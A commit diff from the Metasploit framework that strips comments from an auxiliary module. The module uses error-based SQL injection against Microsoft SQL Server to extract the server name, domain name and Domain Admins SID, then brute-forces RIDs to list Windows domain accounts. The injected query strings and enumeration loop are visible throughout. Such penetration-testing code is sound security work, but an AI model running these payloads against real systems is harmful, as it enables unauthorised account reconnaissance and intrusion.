Delete unnecessary comments
* No need to comment every step, just relevant comments to undrestad code.bug/bundler_fix
jvazquez-r7
parent
f93dbc6deb
commit
cd43f83cd7
|
|
@ -39,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
|
||||||
# Get the server name
|
|
||||||
print_status("#{peer} - Grabbing the server and domain name...")
|
print_status("#{peer} - Grabbing the server and domain name...")
|
||||||
db_server_name = get_server_name
|
db_server_name = get_server_name
|
||||||
if db_server_name.nil?
|
if db_server_name.nil?
|
||||||
|
|
@ -49,7 +48,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_good("#{peer} - Server name: #{db_server_name}")
|
print_good("#{peer} - Server name: #{db_server_name}")
|
||||||
end
|
end
|
||||||
|
|
||||||
# Get the domain name of the SQL Server
|
|
||||||
db_domain_name = get_domain_name
|
db_domain_name = get_domain_name
|
||||||
if db_domain_name.nil?
|
if db_domain_name.nil?
|
||||||
print_error("#{peer} - Unable to grab domain name")
|
print_error("#{peer} - Unable to grab domain name")
|
||||||
|
|
@ -64,7 +62,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_good("#{peer} - Domain name: #{db_domain_name}")
|
print_good("#{peer} - Domain name: #{db_domain_name}")
|
||||||
end
|
end
|
||||||
|
|
||||||
# Get the SID for the domain
|
|
||||||
print_status("#{peer} - Grabbing the SID for the domain...")
|
print_status("#{peer} - Grabbing the SID for the domain...")
|
||||||
windows_domain_sid = get_windows_domain_sid(db_domain_name)
|
windows_domain_sid = get_windows_domain_sid(db_domain_name)
|
||||||
if windows_domain_sid.nil?
|
if windows_domain_sid.nil?
|
||||||
|
|
@ -121,17 +118,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_status("Query results have been saved to: #{path}")
|
print_status("Query results have been saved to: #{path}")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Get the server name
|
||||||
def get_server_name
|
def get_server_name
|
||||||
|
|
||||||
# Setup query
|
|
||||||
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
|
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
|
||||||
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
|
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
|
||||||
sql = "(select '#{clue_start}'+@@servername+'#{clue_end}')"
|
sql = "(select '#{clue_start}'+@@servername+'#{clue_end}')"
|
||||||
|
|
||||||
# Run query
|
|
||||||
result = mssql_query(sql)
|
result = mssql_query(sql)
|
||||||
|
|
||||||
# Parse result
|
|
||||||
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
||||||
instance_name = $1
|
instance_name = $1
|
||||||
sql_server_name = instance_name.split('\\')[0]
|
sql_server_name = instance_name.split('\\')[0]
|
||||||
|
|
@ -142,17 +136,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
sql_server_name
|
sql_server_name
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Get the domain name of the SQL Server
|
||||||
def get_domain_name
|
def get_domain_name
|
||||||
|
|
||||||
# Setup query
|
|
||||||
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
|
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
|
||||||
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
|
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
|
||||||
sql = "(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')"
|
sql = "(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')"
|
||||||
|
|
||||||
# Run query
|
|
||||||
result = mssql_query(sql)
|
result = mssql_query(sql)
|
||||||
|
|
||||||
# Parse result
|
|
||||||
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
||||||
domain_name = $1
|
domain_name = $1
|
||||||
else
|
else
|
||||||
|
|
@ -162,27 +153,20 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
domain_name
|
domain_name
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Get the SID for the domain
|
||||||
def get_windows_domain_sid(db_domain_name)
|
def get_windows_domain_sid(db_domain_name)
|
||||||
|
|
||||||
# Setup group
|
|
||||||
domain_group = "#{db_domain_name}\\Domain Admins"
|
domain_group = "#{db_domain_name}\\Domain Admins"
|
||||||
|
|
||||||
# Randomized start and stop flags
|
|
||||||
clue_start = Rex::Text.rand_text_alpha(8)
|
clue_start = Rex::Text.rand_text_alpha(8)
|
||||||
clue_end = Rex::Text.rand_text_alpha(8)
|
clue_end = Rex::Text.rand_text_alpha(8)
|
||||||
|
|
||||||
# Setup query
|
|
||||||
sql = "(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))"
|
sql = "(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))"
|
||||||
|
|
||||||
# Run query
|
|
||||||
result = mssql_query(sql)
|
result = mssql_query(sql)
|
||||||
|
|
||||||
# Parse result
|
|
||||||
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
||||||
object_sid = $1
|
object_sid = $1
|
||||||
domain_sid = object_sid[0..47]
|
domain_sid = object_sid[0..47]
|
||||||
|
|
||||||
# Return if sid does not resolve for a domain
|
|
||||||
return nil if domain_sid.empty?
|
return nil if domain_sid.empty?
|
||||||
else
|
else
|
||||||
domain_sid = nil
|
domain_sid = nil
|
||||||
|
|
@ -191,14 +175,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
domain_sid
|
domain_sid
|
||||||
end
|
end
|
||||||
|
|
||||||
# Get list of windows accounts,groups,and computer accounts
|
# Get list of windows accounts, groups and computer accounts
|
||||||
def get_win_domain_users(windows_domain_sid)
|
def get_win_domain_users(windows_domain_sid)
|
||||||
|
|
||||||
# Randomized start and stop flags
|
|
||||||
clue_start = Rex::Text.rand_text_alpha(8)
|
clue_start = Rex::Text.rand_text_alpha(8)
|
||||||
clue_end = Rex::Text.rand_text_alpha(8)
|
clue_end = Rex::Text.rand_text_alpha(8)
|
||||||
|
|
||||||
# Create array to store the windws accounts etc
|
|
||||||
windows_logins = []
|
windows_logins = []
|
||||||
|
|
||||||
# Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function
|
# Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function
|
||||||
|
|
@ -224,23 +205,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
# Setup query
|
|
||||||
sql = "(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{win_sid}) as name)+'#{clue_end}')"
|
sql = "(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{win_sid}) as name)+'#{clue_end}')"
|
||||||
|
|
||||||
# Execute query
|
|
||||||
result = mssql_query(sql)
|
result = mssql_query(sql)
|
||||||
|
|
||||||
# Parse result
|
|
||||||
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
||||||
windows_login = $1
|
windows_login = $1
|
||||||
|
|
||||||
# Print account,group,or computer account etc
|
|
||||||
if windows_login.length != 0
|
if windows_login.length != 0
|
||||||
print_status("#{peer} - #{windows_login}")
|
print_status("#{peer} - #{windows_login}")
|
||||||
|
|
||||||
# Add to windows domain object list
|
|
||||||
windows_logins.push(windows_login) unless windows_logins.include?(windows_login)
|
windows_logins.push(windows_login) unless windows_logins.include?(windows_login)
|
||||||
|
|
||||||
# Verbose output
|
# Verbose output
|
||||||
vprint_status("#{peer} - Test sid: #{win_sid}")
|
vprint_status("#{peer} - Test sid: #{win_sid}")
|
||||||
end
|
end
|
||||||
|
|
@ -248,7 +222,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Return list of windows accounts
|
|
||||||
windows_logins
|
windows_logins
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue